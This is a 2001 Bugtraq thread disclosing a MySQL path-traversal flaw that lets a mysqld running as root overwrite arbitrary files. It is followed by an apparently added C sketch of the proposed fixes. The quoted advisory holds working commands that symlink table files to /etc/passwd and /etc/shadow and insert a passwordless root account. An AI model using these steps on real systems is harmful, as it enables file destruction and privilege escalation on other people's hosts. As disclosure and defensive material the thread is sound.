Bugtraq mailing list archives
Re: potential vulnerability of mysqld running with root privileges (can be used as good DoS or r00t exploit)
From: JT <luser () AHAB COM>
Date: Wed, 21 Mar 2001 16:01:12 -0500
Yes, this does work with current mysql. I did manage to overwrite a file to which mysql daemon had permissions. When I tried using these strategies to overwrite a file to which mysqld didn't have permissions (~/etc/master.passwd), I ended up getting:

ERROR 1: Can't create/write to file '/../tmp/fucked.MYD' (Errcode: 13)

Which is another reason that running mysqld as root is like running a steeplechase with a loaded gun in your mouth.

On Tue, Mar 20, 2001 at 12:02:58PM +1100, Scott Fagg wrote:
Works for mysql 3.23.32 running as root.

I used:

mysql -u root ../../../../tmp
create table yikes(w int(4));

This created /tmp/yikes.*

"Pavlov, Lesha" <lesha () NN RU> 19/3/01 4:32:37 am >>>

Anybody who gets a login and password to mysql can use it as a DoS or r00t exploit, because mysql accepts '../blah-blah' as a valid database name and each table is represented by 3 files: tablename.ISD, tablename.ISM and tablename.frm. But when mysqld checks whether a table already exists or not, it checks _only_ tablename.frm.

Usage of this "vulnerable feature of mysql" to make a big DoS (will overwrite any file you wish):

$ cd /var/tmp
$ ln -s /some/file/you/wish/to/owerwrite qqq.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table qqq(www int);
\q
$

File /some/file/you/wish/to/overwrite will be overwritten.

Usage as r00t exploit:

$ cd /var/tmp
$ ln -s /etc/passwd gotcha.ISD
$ ln -s /etc/shadow make_me_r00t.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table gotcha(qqq varchar(255));
create table make_me_r00t(qqq varchar(255));
insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
\q
$

You getta r00t now!

Recommendations:
* Patch mysql so that when it checks whether a table is present, it checks all tablename.{ISD,ISM,frm} files, not only tablename.frm
* Patch mysql to treat database names starting with '..' as incorrect database names.
* And the main recommendation - do not run mysqld as root!!!

Patches: not yet

Workaround: chown existing database tables to a normal user and run mysqld as this unprivileged user - it will be a better solution!

Vulnerable versions: This DoS/exploit was tested on mysql-3.20.32a, but I see other versions of mysql are also vulnerable.

Comments: Mysql dox recommends don't run mysqld as root, but people from RedHat didn't read mysql dox - mysql installed from rpm is vulnerable.
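
The two code-level recommendations in the quoted advisory (refuse database names that start with '..', and check all three table files instead of only tablename.frm), sketched in C as an added example. This is not MySQL source and not code from anyone in the thread; the function names, the 64-byte length limit and the 0600 mode are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The three per-table files named in the advisory. */
static const char *const TABLE_EXTS[] = { ".ISD", ".ISM", ".frm" };

/* Return 1 if name is usable as one path component (assumed policy: stricter than "no leading '..'"). */
int db_name_ok(const char *name)
{
    size_t len = strlen(name);
    if (len == 0 || len > 64 || name[0] == '.')   /* 64 is an assumed limit */
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (c == '/' || c == '\\' || c < 0x20)     /* no separators or control bytes */
            return 0;
    }
    return 1;
}

/* Return 1 only if none of the table's three files exist in dir.
 * lstat() does not follow symlinks, so a planted link counts as "present". */
int table_files_absent(const char *dir, const char *table)
{
    char path[4096];
    struct stat st;
    for (size_t i = 0; i < sizeof TABLE_EXTS / sizeof TABLE_EXTS[0]; i++) {
        int n = snprintf(path, sizeof path, "%s/%s%s", dir, table, TABLE_EXTS[i]);
        if (n < 0 || (size_t)n >= sizeof path)
            return 0;                              /* truncated path: fail closed */
        if (lstat(path, &st) == 0 || errno != ENOENT)
            return 0;                              /* exists, or cannot tell */
    }
    return 1;
}

/* Create one table file; O_CREAT|O_EXCL fails with EEXIST even on a dangling symlink. */
int create_table_file(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}
```

Neither check replaces the main recommendation: a mysqld that runs as an unprivileged user cannot write to root-owned files even if a name check is missed.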